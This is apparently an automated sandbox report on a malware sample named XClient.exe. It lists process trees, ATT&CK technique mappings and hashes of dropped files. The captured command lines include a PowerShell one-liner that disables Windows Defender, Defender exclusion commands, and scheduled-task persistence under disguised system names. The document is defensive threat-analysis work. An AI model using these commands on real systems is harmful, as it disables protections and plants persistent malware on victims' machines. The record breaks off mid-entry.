PID 1072 wrote to memory of 2972	1072	XClient.exe	129
PID 1072 wrote to memory of 2972	1072	XClient.exe	129
PID 2972 wrote to memory of 3016	2972	TOBT66RBMHPKUAF.exe	130
PID 2972 wrote to memory of 3016	2972	TOBT66RBMHPKUAF.exe	130
PID 2972 wrote to memory of 3016	2972	TOBT66RBMHPKUAF.exe	130
PID 3016 wrote to memory of 1376	3016	WScript.exe	131
PID 3016 wrote to memory of 1376	3016	WScript.exe	131
PID 3016 wrote to memory of 1376	3016	WScript.exe	131
PID 1376 wrote to memory of 4088	1376	cmd.exe	133
PID 1376 wrote to memory of 4088	1376	cmd.exe	133
PID 328 wrote to memory of 2060	328	XYR269UW2X56RGZ.exe	136
PID 328 wrote to memory of 2060	328	XYR269UW2X56RGZ.exe	136
PID 328 wrote to memory of 4136	328	XYR269UW2X56RGZ.exe	135
PID 328 wrote to memory of 4136	328	XYR269UW2X56RGZ.exe	135
PID 1072 wrote to memory of 4588	1072	XClient.exe	138
PID 1072 wrote to memory of 4588	1072	XClient.exe	138
PID 1072 wrote to memory of 1896	1072	XClient.exe	139
PID 1072 wrote to memory of 1896	1072	XClient.exe	139

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:688
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  - Command and Scripting Interpreter: PowerShell
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:1764
- - C:\Windows\system32\sc.exe
    "C:\Windows\system32\sc.exe" qc windefend
    3⤵
    - Launches sc.exe
    PID:3620
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
    3⤵
    PID:1164
- - C:\Windows\system32\whoami.exe
    "C:\Windows\system32\whoami.exe" /groups
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4108
- - C:\Windows\system32\net1.exe
    "C:\Windows\system32\net1.exe" stop windefend
    3⤵
    PID:4152
- - C:\Windows\system32\sc.exe
    "C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE
    3⤵
    - Launches sc.exe
    PID:2432

C:\Users\Admin\AppData\Local\Temp\XClient.exe
"C:\Users\Admin\AppData\Local\Temp\XClient.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1072
- C:\Users\Admin\AppData\Local\Temp\XYR269UW2X56RGZ.exe
  "C:\Users\Admin\AppData\Local\Temp\XYR269UW2X56RGZ.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4356
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XYR269UW2X56RGZ" /tr "C:\Users\Admin\AppData\Roaming\XYR269UW2X56RGZ.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:1012
- C:\Users\Admin\AppData\Local\Temp\LRZDBCUY9IYTYZA.exe
  "C:\Users\Admin\AppData\Local\Temp\LRZDBCUY9IYTYZA.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:1832
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\HypercomponentCommon\I1SNCaG9QwHssjsi1vS2b9DJmZMoJ4clEjNn.vbe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:892
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\HypercomponentCommon\cemEzm0xYx1.bat" "
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4268
    - - C:\HypercomponentCommon\hyperSurrogateagentCrt.exe
        
        "C:\HypercomponentCommon/hyperSurrogateagentCrt.exe"
        5⤵
        Modifies WinLogon for persistence
        Executes dropped EXE
        Adds Run key to start application
        Drops file in Program Files directory
        Drops file in Windows directory
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:644
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0zgyju0l\0zgyju0l.cmdline"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4708
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3E2D.tmp" "c:\Users\Admin\AppData\Roaming\CSCF795A17B2C2B41F3B1AD1B76ECBE216.TMP"
        7⤵
        
        PID:1892
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\lly4cse5\lly4cse5.cmdline"
        6⤵
        Drops file in System32 directory
        Suspicious use of WriteProcessMemory
        
        PID:3284
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3EC9.tmp" "c:\Windows\System32\CSCA3B127F226C34C09975C583660B9125C.TMP"
        7⤵
        
        PID:4760
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Sidebar\Gadgets\dllhost.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2420
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Google\Update\1.3.36.371\XClient.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1736
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\BitLockerDiscoveryVolumeContents\dwm.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2144
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Mozilla Maintenance Service\logs\System.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1204
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Mozilla Firefox\dllhost.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1616
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\HypercomponentCommon\hyperSurrogateagentCrt.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2072
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\w5I23rwOVM.bat"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2036
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        7⤵
        
        PID:4588
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        7⤵
        
        PID:4916
        
        C:\Program Files (x86)\Mozilla Maintenance Service\logs\System.exe
        
        "C:\Program Files (x86)\Mozilla Maintenance Service\logs\System.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4396
- C:\Users\Admin\AppData\Local\Temp\AJLF0KZUL5VL5NH.exe
  "C:\Users\Admin\AppData\Local\Temp\AJLF0KZUL5VL5NH.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:5076
- C:\Users\Admin\AppData\Local\Temp\TOBT66RBMHPKUAF.exe
  "C:\Users\Admin\AppData\Local\Temp\TOBT66RBMHPKUAF.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID:2972
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\HypercomponentCommon\I1SNCaG9QwHssjsi1vS2b9DJmZMoJ4clEjNn.vbe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3016
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\HypercomponentCommon\cemEzm0xYx1.bat" "
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1376
    - - C:\HypercomponentCommon\hyperSurrogateagentCrt.exe
        
        "C:\HypercomponentCommon/hyperSurrogateagentCrt.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:4088
- C:\Windows\system32\sc.exe
  "C:\Windows\system32\sc.exe" qc windefend
  2⤵
  - Launches sc.exe
  PID:4588
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
  2⤵
  PID:1896
- C:\Windows\system32\whoami.exe
  "C:\Windows\system32\whoami.exe" /groups
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2848
- C:\Windows\system32\net1.exe
  "C:\Windows\system32\net1.exe" start TrustedInstaller
  2⤵
  PID:4400
- C:\Windows\system32\net1.exe
  "C:\Windows\system32\net1.exe" start lsass
  2⤵
  PID:2392

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Sidebar\Gadgets\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2872

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Sidebar\Gadgets\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3100

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Sidebar\Gadgets\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2408

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "XClientX" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Google\Update\1.3.36.371\XClient.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4396

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "XClient" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\Update\1.3.36.371\XClient.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2876

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "XClientX" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Google\Update\1.3.36.371\XClient.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:784

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 9 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\dwm.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2244

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1416

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 5 /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\dwm.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:436

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\System.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2836

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3024

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Mozilla Maintenance Service\logs\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1516

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Program Files\Mozilla Firefox\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4488

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Mozilla Firefox\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4304

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Program Files\Mozilla Firefox\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:816

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "hyperSurrogateagentCrth" /sc MINUTE /mo 8 /tr "'C:\HypercomponentCommon\hyperSurrogateagentCrt.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5084

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "hyperSurrogateagentCrt" /sc ONLOGON /tr "'C:\HypercomponentCommon\hyperSurrogateagentCrt.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4724

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "hyperSurrogateagentCrth" /sc MINUTE /mo 14 /tr "'C:\HypercomponentCommon\hyperSurrogateagentCrt.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4388

C:\Users\Admin\AppData\Roaming\XYR269UW2X56RGZ.exe
C:\Users\Admin\AppData\Roaming\XYR269UW2X56RGZ.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:328
- C:\Program Files (x86)\Windows Sidebar\Gadgets\dllhost.exe
  "C:\Program Files (x86)\Windows Sidebar\Gadgets\dllhost.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4136
- C:\Users\Admin\AppData\Roaming\XYR269UW2X56RGZ.exe.exe
  "C:\Users\Admin\AppData\Roaming\XYR269UW2X56RGZ.exe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2060

C:\Users\Admin\AppData\Roaming\XYR269UW2X56RGZ.exe
C:\Users\Admin\AppData\Roaming\XYR269UW2X56RGZ.exe
1⤵
- Executes dropped EXE
PID:1636
- C:\Users\Admin\AppData\Roaming\XYR269UW2X56RGZ.exe.exe
  "C:\Users\Admin\AppData\Roaming\XYR269UW2X56RGZ.exe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4768
- C:\Program Files (x86)\Windows Sidebar\Gadgets\dllhost.exe
  "C:\Program Files (x86)\Windows Sidebar\Gadgets\dllhost.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:1136

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\HypercomponentCommon\I1SNCaG9QwHssjsi1vS2b9DJmZMoJ4clEjNn.vbe

Filesize
220B

MD5
47085bdd4e3087465355c9bb9bbc6005

SHA1
bf0c5b11c20beca45cc9d4298f2a11a16c793a61

SHA256
80577e4666fad86273b01f60b8d63c15e4ce37774575ac1e0df7a7c396979752

SHA512
e74dd8e9756cab1123410a46609dc91540cc29a8fea93017155746f7bb9b7a41bfd3d7595a62788264bedceb475b2a733cce9b70f37cc4478302d5fc228d7684

Download Submit
C:\HypercomponentCommon\cemEzm0xYx1.bat

Filesize
105B

MD5
5ee2935a1949f69f67601f7375b3e8a3

SHA1
6a3229f18db384e57435bd3308298da56aa8c404

SHA256
c24a0d7f53a7aa3437f6b6566d3aaebdb36053b64e72cbd1d3796596fc8e3c06

SHA512
9777fcb9ee8a8aa0c770c835c5f30aff6efc5fb16a1819047e13d580d748703ffcb446db110067fb2546a637213cb8f25416d4b621a95a789b8e113d31d3401a

Download Submit
C:\HypercomponentCommon\hyperSurrogateagentCrt.exe

Filesize
1.9MB

MD5
7be5cea1c84ad0b2a6d2e5b6292c8d80

SHA1
631e3de0fe83ebacbe5be4e7f895dd0bd8b095ce

SHA256
6eb90684ebc56fb2713f5c468b55a964625ec2af698d9687492b1de4225693b7

SHA512
ea58d3b1664fe70968635c2722e19ce65ce4c1d66c68aed2d98441e60e773c7295f18d9c99cf4c454c510f33f5e37d3d2c0053b7434a46c542a0d63a4cc03647

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XYR269UW2X56RGZ.exe.exe.log

Filesize
654B

MD5
2cbbb74b7da1f720b48ed31085cbd5b8

SHA1
79caa9a3ea8abe1b9c4326c3633da64a5f724964

SHA256
e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3

SHA512
ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\XYR269UW2X56RGZ.exe.log

Filesize
226B

MD5
4ae344179932dc8e2c6fe2079f9753ef

SHA1
60eacc624412b1f34809780769e3b212f138ea9c

SHA256
3063de3898a9b34e19f8cf0beeec2b8bd6bd05896b52abd73f4703d07b8a7cd4

SHA512
fadfe2b83f1af8fdc50430325f69d6172d2c1e889ca3800b3b83e5535d5970c32e9a176b48563275a0630d56c96d9f88df148fd6b2d281f0fc58129e5f4dba19

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dllhost.exe.log

Filesize
847B

MD5
2940b232afa412901f8ae5651c790f93

SHA1
f79bd5d1433c803515e2d9a016396344187beea2

SHA256
16f4a7736a0c2aee54256d3d75ce4c0816fabf130b3b92340deca34c5f5fda43

SHA512
553d5491c9bc358c7ce8a95caa445e882ab4bf744a2f5be1b2131c20f27321f65121389fd076558ba415f322fdad6ed36a05902e5c55cbbeace371182890af27

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\hyperSurrogateagentCrt.exe.log

Filesize
1KB

MD5
1126a1de0a15000f1687b171641ffea6

SHA1
dcc99b2446d05b8f0f970e3e9105198a20ca9e78

SHA256
b886b6c74da838e87b2cbc539ee657a2817d126b55c0cbd6d1ab91480261bcc7

SHA512
6cfb73ea43899ffa3cecd354cd76b0a1a67f57d9054c3e31cff43424491ed3bceae5aecd0f5c414ba92aab539eb7d55af3d40eedde80c9af8d34649bb1f8d4b4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d0a4a3b9a52b8fe3b019f6cd0ef3dad6

SHA1
fed70ce7834c3b97edbd078eccda1e5effa527cd

SHA256
21942e513f223fdad778348fbb20617dd29f986bccd87824c0ae7f15649f3f31

SHA512
1a66f837b4e7fb6346d0500aeacb44902fb8a239bce23416271263eba46fddae58a17075e188ae43eb516c841e02c87e32ebd73256c7cc2c0713d00c35f1761b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
aa4f31835d07347297d35862c9045f4a

SHA1
83e728008935d30f98e5480fba4fbccf10cefb05

SHA256
99c83bc5c531e49d4240700142f3425aba74e18ebcc23556be32238ffde9cce0

SHA512
ec3a4bee8335007b8753ae8ac42287f2b3bcbb258f7fc3fb15c9f8d3e611cb9bf6ae2d3034953286a34f753e9ec33f7495e064bab0e8c7fcedd75d6e5eb66629

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
05b3cd21c1ec02f04caba773186ee8d0

SHA1
39e790bfe10abf55b74dfb3603df8fcf6b5e6edb

SHA256
911efc5cf9cbeb697543eb3242f5297e1be46dd6603a390140a9ff031ed9e1e8

SHA512
e751008b032394817beb46937fd93a73be97254c2be94dd42f22fb1306d2715c653ece16fa96eab1a3e73811936768cea6b37888437086fc6f3e3e793a2515eb

Download Submit
C:\Users\Admin\AppData\Local\Temp\LRZDBCUY9IYTYZA.exe

Filesize
2.2MB

MD5
05d87a4a162784fd5256f4118aff32af

SHA1
484ed03930ed6a60866b6f909b37ef0d852dbefd

SHA256
7e3d0dabaded78094abfac40d694eaebf861f3cb865d3835bb053d435e996950

SHA512
3d4ce511e9671d8bfa15e93d681fedd972f4fe4c09ac9cfd9653afe83e936654c88ee515a76e7ac80e8f34868802e68c6531fdea0b718029d2196ad1425981fc

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES3E2D.tmp

Filesize
1KB

MD5
966c3c4130576f866b7dda5389008bba

SHA1
a03b77bbb0d216e80a7e5d9594952769ba1536df

SHA256
237c801cedd0bee5dfa978ba3f672a11745caad48bff317968e721073b46678d

SHA512
b21679d3eb3c3d49e07999ba1eac11d8c4c41c1bb71a0db62bf27818c48573f361c8e442cda10ac927a343019d7d0b9210dee565e4728723e948e534ffe0a64f

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES3EC9.tmp

Filesize
1KB

MD5
f84b95dedf30aa9cb2c09b97cd74ebc3

SHA1
54ddbff0c173cb3d7dc83da35b6fa2fa651ec191

SHA256
a5180d0d61b692430b18668f7d0e93b245faa3042211eef4cbcf015cd9e35773

SHA512
3dd4d0c565b14c85789f4fda17d01d6acc8f6cb368f8be79046c2f93f1deffeed3889ef96f22442f75e4bceae44037f75c1ffbfde129af3ef71312b4d8d2ea81

Download Submit
C:\Users\Admin\AppData\Local\Temp\XYR269UW2X56RGZ.exe

Filesize
185KB

MD5
e0c8976957ffdc4fe5555adbe8cb0d0c

SHA1
226a764bacfa17b92131993aa85fe63f1dbf347c

SHA256
b8260ac46e03f2a7baa9ae01bee5443d16d9eb96f6ee8588a887d6de72a750d4

SHA512
3a1ea48e81ebfd5586938a72afd68bcc48d4c5d69949cfdacf33aee3371d98f202443f5db12bac876ca7cecc982ddc56827f8d9b1857d22bda71242d5b2cc71e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s3eibmzg.i1e.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\w5I23rwOVM.bat

Filesize
242B

MD5
51aec62800cff2d4e9e46f61a7b7fa5e

SHA1
07c58b2368ac4b3778c8e1cd2278dc0329b969a8

SHA256
a682bb7e16b003a17835b35dcc158cf0d6ffd23fcd48d113a53ee615f4935a5f

SHA512
9044f8533adf481ad3b8b2c0ec64bc82dca056e1f7dd3b57e4ed8a512c2769ba07843f011dba4d0be441438578368fd67926e2b429fbcf1f9833f55b65dbd2ea

Download Submit
C:\Users\Admin\AppData\Roaming\XYR269UW2X56RGZ.exe

Filesize
4KB

MD5
7caba83aa0ef3e8f737463976122f611

SHA1
e536b19809aaa465567236a0a087956df70b7de4

SHA256
6c71c2773fadc1ab065e8a8d7d9f7ce22f4609aaf56cdc9093933827fd5241e5

SHA512
b4823bbdeb09f063b7e43f254bc4f8c493679d014a97b5d32f9526380c8325b75a86f1bdb430d8e195a776c76cda9b8edee068952d7facf7d376dd6b3beb57dd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0zgyju0l\0zgyju0l.0.cs

Filesize
410B

MD5
37f5a9a57874bad23c138af94db88d83

SHA1
068393b859ecac7149964811151e65de8197ea09

SHA256
a8dfeea710d60fc171b6f10d04daeeafa6ccefa350d5e6c742b5956d7a2d9045

SHA512
6dc279942f05b9a2d09fa12b22c9e8b311b2a7fed07195896af4750a186111ab6085a8fe80bda4c512c37b21c6302bdaafd562458b004f75eb6b921944832721

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\0zgyju0l\0zgyju0l.cmdline

Filesize
255B

MD5
6800d1d4666bb507385da4f61d24e45f

SHA1
b7b3b4aee28a397d9b880b6e66396d0f6b699f30

SHA256
8e5a092385cb01337ac1607b5765d9ccbb0ee9169f8bd8f63cdc4439f98c22c2

SHA512
8fad52d1c1f97c248496f27b3aae5081963a432b6464a9d6ea52b6ab6991738291e06fdb454b9d7f8d70d2b01e80c497e554aecc3645c131c847909c9e402165

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lly4cse5\lly4cse5.0.cs

Filesize
390B

MD5
1320a555a60d66f718f658ceb7165b5d

SHA1
d11a1bd46b0a73830a38129a95f5c5d6595d4613

SHA256
565a161d30e7eec2b69d5e96cf82ed289b7917077ceb473baf4311f62f5feb59

SHA512
0f440af6ba8b7d57c035a0050236f99b648c331c5d35f35624ac91676bc575e8b2c5379d04d78f0083e04c48b4202985884e0412d74cdb276445b72539948b65

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lly4cse5\lly4cse5.cmdline

Filesize
235B

MD5
87d2c478967a60821c35447f5a9c72d3

SHA1
2433b2facfe2154175a0a884a1b10a7890f6517d

SHA256
e439b0352ed015c12b66eaf143ca6a90ffa4fb77ee34ecb1f05d6347ba2bab9b

SHA512
0b6b04727a0d3fb448db4683a2d484b49a5c3abf013fcd4b73087558a4248233bf4470784c3d60b18e06fddcab6aa1b2aa470e6fd46ec5f0d1017ce9a335db29

Download Submit
\??\c:\Users\Admin\AppData\Roaming\CSCF795A17B2C2B41F3B1AD1B76ECBE216.TMP

Filesize
1KB

MD5
dfca71d425836f13c24edf5df990b85f

SHA1
02ca2fdb1821421d9730d252ad4502e65de681b2

SHA256
